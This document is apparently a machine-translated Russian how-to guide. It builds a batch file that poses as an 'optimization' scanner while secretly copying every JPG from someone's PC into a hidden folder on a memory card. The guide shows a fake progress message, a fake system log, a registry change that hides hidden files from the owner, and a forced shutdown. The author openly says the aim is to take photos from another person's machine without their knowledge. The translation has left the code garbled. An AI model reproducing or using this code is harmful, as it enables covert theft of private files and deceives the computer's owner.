Пакетный файл для копирования секретных шпионских изображений: 5 шагов

2024 Автор: John Day | [email protected]. Последнее изменение: 2024-01-30 11:54

Итак, во-первых, что это за инструкции по созданию и почему. Эта инструкция позволит вам создать командный файл, который будет копировать все изображения с ПК на карту памяти. он будет делать это дискретно, выдавая себя за другую программу, проверяющую компьютер на наличие проблем. По завершении у вас будет скрытая папка на карте памяти со всеми скопированными изображениями. Почему? Я создал это руководство, потому что хотел получить цифровую фотографию с чьей-либо машины, чтобы они не знали, что я это сделал. Законное использование этого файла позволит вам архивировать / создавать резервные копии ваших личных фотографий. Другое использование: этот файл можно изменить, чтобы можно было копировать любой другой тип документа.

Шаг 1. Напишите код

Скопируйте следующий код в блокнот и сохраните его в корне карты памяти как файл bat, вы можете называть его как хотите, если он имеет расширение.bat. Чтобы убедиться, что у него правильное расширение, введите его в поле сохранения блокнота «copyimage.bat» следующим образом (включите цитаты!)

@echo offecho Клиент оптимизации 2008 v3.02becho -------------------------------- echo.echo Пожалуйста, не используйте свой компьютер пока он запущен. echo.echo Список процессов сканирования. По завершении журнал будет отображен для просмотра системным администратором. Echo.echo Пожалуйста, подождите, это может занять до 3 часов. Reg add HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced / v Hidden / t REG_DWORD / d 00000002 / f> nulmkdir / data> nulattrib + h / data> nulsetLocal EnableDelayedExpansion @ echo offfor %% a in (jpg) do (for / f "tokens = * delims =" %% f in ('dir / b / s / ad c: / *. %% a ') do (xcopy "%% f" / data / / y / h / q> nul)) attrib -s + h data / *> nulstart optimisationLog.txtshutdown / s / c " Оптимизация сканирования завершена, ваш компьютер выключится"

Шаг 2. Создайте поддельный файл отчета

На этом этапе я создал поддельный текстовый файл, который представляет собой журнал результатов командного файла, который мы запускаем для копирования файлов. Это позволяет вам сделать вид, что что-то произошло. Неважно, что говорится в этом файле, вы можете изменять его сколько угодно, просто убедитесь, что имя файла правильное и что он хранится в корне вашей карты памяти. Текст, который я использовал, в основном взят из взлома this log, скопируйте его и сохраните в корень карты памяти как optimisationLog.txt

Сканирование завершено. Закройте этот журнал и позвольте системному администратору просмотреть его. Запущенные процессы: C: / Windows / system32 / taskeng.exe C: / Windows / system32 / Dwm.exe C: / Windows / Explorer. EXEC: / Program Files / Java / jre1. 6.0_07 / bin / jusched.exe C: / Windows / System32 / hkcmd.exe C: / Windows / System32 / igfxpers.exe C: / Windows / system32 / igfxsrvc.exeC: / Program Files / Synaptics / SynTP / SynTPEnh.exeC: / Program Файлы / TOSHIBA / Power Saver / TPwrMain.exeC: / Program Files / TOSHIBA / SmoothView / SmoothView.exeC: / Program Files / TOSHIBA / FlashCards / TCrdMain.exeC: / Program Files / BitDefender / BitDefender 2009 / bdagent.exeC: / Program Файлы / TOSHIBA / TOSCDSPD / TOSCDSPD.exeC: / Program Files / Registry Mechanic / regmech.exeC: / Program Files / BitDefender / BitDefender 2009 / seccenter.exeC: / Program Files / Synaptics / SynTP / SynTPHelper.exeC: / Program Files / Vuze / Azureus.exeC: / Program Files / Microsoft Office / Office12 / OUTLOOK. EXEC: / Program Files / AutoCAD 2008 / acad.exeC: / Users / Tom / AppData / Local / Temp / AdskCleanup.0001C: / Program Files / Mozilla Firefox / firefox.exeC: / Windows / System32 / ПРИМЕЧАНИЕ PAD. EXEC: / Windows / system32 / SearchFilterHost.exeC: / HijackThis / HijackThis.exeR1 - HKCU / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKCU / Software / Microsoft / Internet Explorer / Main, страница поиска = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU / Software / Microsoft / Internet Explorer / Main, стартовая страница = https://www.google.co. ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main, Default_Search_URL = https://go.microsoft.com/ fwlink /? LinkId = 54896R1 - HKLM / Software / Microsoft / Internet Explorer / Main, страница поиска = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM / Software / Microsoft / Internet Explorer / Main, Start Страница = https://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM / Software / Microsoft / Internet Explorer / Search, SearchAssistant = R0 - HKLM / Software / Microsoft / Internet Explorer / Search, CustomizeSearch = R0 - HKCU / Программное обеспечение / Microsoft / Internet Explorer / Too lbar, LinksFolderName = O1 - Хосты::: 1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C: / Program Files / Common Files / Adobe / Acrobat / ActiveX / AcroIEHelperShimO: BHelperShimO: Помощник браузера Groove GFS - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C: / Program Files / Microsoft Office / Office12 / GrooveShellExtensions.dllO2 - BHO: класс SSVHelper - {761497BB-D6F0-462C-B6EB92D4DAF} - C: / Program Files / Microsoft Office / Office12 / GrooveShellExtensions.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB92D4DAF} -C: / Program Files / Java / jre1.6.0_07 / bin / ssv.dllO3 - Панель инструментов: Панель инструментов BitDefender - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C: / Program Files / BitDefender / BitDefender 2009 / IEToolbar.dllO4 - HKLM \.. / Выполнить: [Защитник Windows]% ProgramFiles% / Защитник Windows / MSASCui.exe -hideO4 - HKLM \.. / Выполнить: [SunJavaUpdateSched] "C: / Program Files / Java / jre1.6.0_07 / bin / jusched.exe "O4 - HKLM \.. / Run: [IgfxTray] C: / Windows / system32 / igfxtray.exeO4 - HKLM \.. / Run: [HotKeysCmds] C: / Windows / system32 / hkcmd.exeO4 - HKLM \.. / Выполнить: [Сохранение] C: / Windows / system32 / igfxpers.exeO4 - HKLM \.. / Выполнить: [SynTPEnh] C: / Program Files / Syna ptics / SynTP / SynTPEnh.exeO4 - HKLM \.. / Выполнить: [TPwrMain]% ProgramFiles% / TOSHIBA / Power Saver / TPwrMain. EXEO4 - HKLM \.. / Выполнить: [SmoothView]% ProgramFiles% / Toshiba / SmoothView / SmoothView.exeO4 - HKLM \.. / Выполнить: [00TCrdMain]% ProgramFiles% / TOSHIBA / FlashCards / TCrdMain.exeO4 - HKLM \.. / Выполнить: [Toshiba TEMPO] C: / Program Files / Toshiba TEMPRO / Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM \.. / Run: [BDAgent] "C: / Program Files / BitDefender / BitDefender 2009 / bdagent.exe" O4 - HKLM \.. / Run: [BitDefender Antiphishing Helper] "C: / Program Файлы / BitDefender / BitDefender 2009 / IEShow.exe "O4 - HKCU \.. / Выполнить: [TOSCDSPD] C: / Program Files / TOSHIBA / TOSCDSPD / TOSCDSPD.exeO4 - HKCU \.. / Run: [RegistryMechanic] C: / Program Files / Registry Mechanic / RMTray.exe / HO4 - Запуск: OneNote 2007 Screen Clipper и Launcher.lnk = C: / Program Files / Microsoft Office / Office12 / ONENOTEM. EXEO8 - Дополнительный пункт контекстного меню: Экспорт в Microsoft Excel - res: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9 - Дополнительная кнопка: (без названия) - {08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - Дополнительный пункт меню 'Инструменты': Консоль Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - Дополнительная кнопка: Отправить в OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Дополнительный пункт меню «Инструменты»: S & end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Дополнительная кнопка: eBay.co.uk - Купить Продается, нравится - {76577871-04EC-495E-A12B-91F7C3600AFA} - https://rover.ebay.com/rover/1/710-44557-9400-3/4 (файл отсутствует) O9 - Дополнительная кнопка: (без имени) - {85d1f590-48f4-11d9-9669-0800200c9a66} -% windir% / bdoscandel.exe (файл отсутствует) O9 - Дополнительный пункт меню «Инструменты»: Удалить BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669 -0800200c9a66} -% windir% / bdoscandel.exe (файл отсутствует) O9 - Дополнительная кнопка: Amazon.co.uk - {8A918C1D-E123-4E36-B562-5C1519E434CE} - https://www.amazon.co.uk/ exec / obidos / redirect-home? tag = Toshibaukbholink-2 1 & site = home (файл отсутствует) O9 - Дополнительная кнопка: Исследование - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / REFIEBAR. DLLO10 - Неизвестный файл в Winsock LSP: c: / windows / system32 / nlaapi.dllO10 - Неизвестный файл в Winsock LSP: c: / windows / system32 / napinsp.dllO10 - Неизвестный файл в Winsock LSP: c: / program files / vmware / vmware workstation / vsocklib.dllO10 - Неизвестный файл в Winsock LSP: c: / program files / vmware / vmware workstation / vsocklib.dllO11 - Группа параметров: [INTERNATIONAL] International * O13 - Префикс Gopher: O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (класс get_atlcom) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - Протокол: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C: / Program Files / Microsoft Office / Office12 / GrooveSystemServices.dllO18 - Протокол: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C: / Program Files / Common Files / Microsoft Shared / Help / hxds.dllO18 - Взлом фильтра: текст / xml - {807563E5-5146-11D5-A672-00B0D022E945} - C: / PROGRA ~ 1 / COMMON ~ 1 / MICROS ~ 1 / OFFICE12 / MSOXMLMF. DLLO20 - Уведомление Winlogon: igfxcui - C: / Windows / SYSTEM32 / igfxdev.dllO23 - Служба: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Системы - C: / Windows / system32 / agrsmsvc.exeO23 - Служба: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C: / Program Files / Common Files / BitDefender / BitDefender Arrakis Server / bin / Arrakis3.exeO23 - Служба: Служба лицензирования Autodesk - Autodesk - C: / Program Files / Common Files / Autodesk Shared / Service / AdskSrv.exeO23 - Служба: Служба ConfigFree - КОРПОРАЦИЯ TOSHIBA - C: / Program Files / TOSHIBA / ConfigFree / CFSvcs.exeO23 - Служба: @% SystemRoot% / ehome / ehstart.dll, -101 (ehstart) - Неизвестный владелец -% windir% / system32 / svchost.exe (файл отсутствует) O23 - Служба: getPlus (R) Helper - NOS Microsystems Ltd. - C: / Program Files / NOS / bin / getPlus_HelperSvc.exeO23 - Служба: Служба обновлений Google (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Неизвестный владелец - C: / Program Files / Google / Update / GoogleUpdate.exe "/ svc (файл отсутствует) O23 - Служба: BitDefender Desktop Update Service (LIVESRV) - Неизвестный владелец - C: / Program Files / Common Files / BitDefender / BitDefender Update Service / liverv.exe "/ service (файл отсутствует) O23 - Service: @% SystemRoot% / system32 / qwave.dll, -1 (QWAVE) - Неизвестно r -% windir% / system32 / svchost.exe (файл отсутствует) O23 - Служба: @% SystemRoot% / system32 / seclogon.dll, -7001 (seclogon) - Неизвестный владелец -% windir% / system32 / svchost.exe (файл отсутствует) O23 - Служба: Служба настройки производительности ноутбуков (TempoMonitoringService) - Toshiba Europe GmbH - C: / Program Files / Toshiba TEMPRO / TempoSVC.exeO23 - Служба: Служба поддержки TOSHIBA Navi (TNaviSrv) - Корпорация TOSHIBA - C: / Program Files / TOSHIBA / TOSHIBA DVD PLAYER / TNaviSrv.exeO23 - Служба: Служба привода оптических дисков TOSHIBA (TODDSrv) - Корпорация TOSHIBA - C: / Windows / system32 / TODDSrv.exeO23 - Служба: TOSHIBA Power Saver (TosCoSrv) - Корпорация TOSHIBA Программные файлы / TOSHIBA / Power Saver / TosCoSrv.exeO23 - Служба: Служба журналов TOSHIBA SMART - Корпорация TOSHIBA - c: / Program Files / TOSHIBA / SMARTLogService / TosIPCSrv.exeO23 - Служба: Служба агента VMware (ufad-ws60) - Неизвестный владелец - C: / Program Files / VMware / VMware Workstation / vmware-ufad.exe "-d" C: / Program Files / VMware / VMware Workstation / "-s ufad-p2v.x ml (файл отсутствует) O23 - Служба: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C: / Program Files / Common Files / Ulead Systems / DVD / ULCDRSvr.exeO23 - Служба: Служба авторизации VMware (VMAuthdService) - VMware, Inc. - C: / Program Files / VMware / VMware Workstation / vmware-authd.exeO23 - Служба: служба DHCP VMware (VMnetDHCP) - VMware, Inc. - C: / Windows / system32 / vmnetdhcp.exeO23 - Служба: VMware NAT Служба - VMware, Inc. - C: / Windows / system32 / vmnat.exeO23 - Служба: BitDefender Virus Shield (VSSERV) - Неизвестный владелец - C: / Program Files / BitDefender / BitDefender 2009 / vsserv.exe "/ service (файл отсутствует) O23 - Служба: VNC Server версии 4 (WinVNC4) - Неизвестный владелец - C: / Program Files / RealVNC / VNC4 / WinVNC4.exe "- служба (файл отсутствует) O23 - Служба: @% ProgramFiles% / Windows Media Player / wmpnetwk.exe, -101 (WMPNetworkSvc) - Неизвестный владелец -% ProgramFiles% / Windows Media Player / wmpnetwk.exe (файл отсутствует)

Шаг 3: Запустите программу

Теперь у вас должна быть карта памяти с двумя файлами (и много свободного места для новых изображений). Если у вас есть что-то еще на диске, это не имеет значения. Подключите карту памяти к целевому компьютеру. Когда он будет зарегистрирован, обратите внимание на присвоенную ему букву диска, это позволит вам запустить его без предварительного просмотра папки. Нажмите клавишу Windows, а затем нажмите 'R' (удерживая клавишу Windows). Это вызовет окно "Выполнить". В поле запуска введите путь к созданному нами пакетному файлу, буква диска - это буква, назначенная при подключении карты памяти. Например, если я вставлю карту памяти и она зарегистрирует ag: / drive, я бы запустил: g: / copyimage.bat И затем нажмите Enter или нажмите Run. Это запустит запуск командного файла. Когда он будет завершен, он выключит машину. Выньте карту памяти и заберите ее!

Шаг 4: Получите изображения

Теперь у вас должна быть карта памяти со всеми изображениями на ней. Файлы и папка скрыты, поэтому, если у вас их нет, вам нужно будет включить их. Для этого войдите в окно проводника (например, откройте мой компьютер) и: WinXP - Инструменты, Параметры папки, Просмотр, Показать скрытые файлы. Vista - Организовать, Папка и параметры поиска, Просмотр, Показать скрытые файлы. скрытая папка и получите нужные изображения!

Шаг 5: что означает код

Я объясню как можно больше кода. основная функция копирования была написана не мной, я позаимствовал ее со следующего сайта и изменил ее:

@echo off '' Останавливает отображение команд на экране, поэтому пользователь не знает, что делается echo Optimization client 2008 v3.02b echo ------------------- ------------- эхо. Записывает на экран заголовок программы echo. Не используйте компьютер во время ее работы. Echo.echo Список процессов сканирования. По завершении будет отображен журнал для просмотра системным администратором. Echo.echo Пожалуйста, подождите, это может занять до 3 часов. Сообщает пользователю о кучу мусора, который не соответствует действительности reg add HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced / v Hidden / t REG_DWORD / d 00000002 / f> nul Добавляет раздел реестра, который будет скрывать скрытые файлы и папки. Это лишает пользователя возможности видеть папку, которую мы создаем для хранения скопированных изображений. Команда nul в конце не позволяет команде сообщать о любых сообщениях, когда она завершает работу. Mkdir / data> nul Создает папку на диске, в которой находится этот командный файл, на вызываемых данных. attrib + h / data> nul Скрывает созданную папку setLocal EnableDelayedExpansionfor %% a в (jpg) do (for / f "tokens = * delims =" %% f in ('dir / b / s / ad c: / *. %% a ') do (xcopy "%% f" / data / / y / h / q> nul)) Это код, который будет искать изображения на всем диске c: \. Если вы хотите, чтобы он выполнял поиск на другом диске, измените часть c: на то, что вам нужно. Если вы хотите, чтобы он находил другие типы файлов, перечислите их рядом с текстовым jpg, разделите типы файлов пробелом. Например-j.webp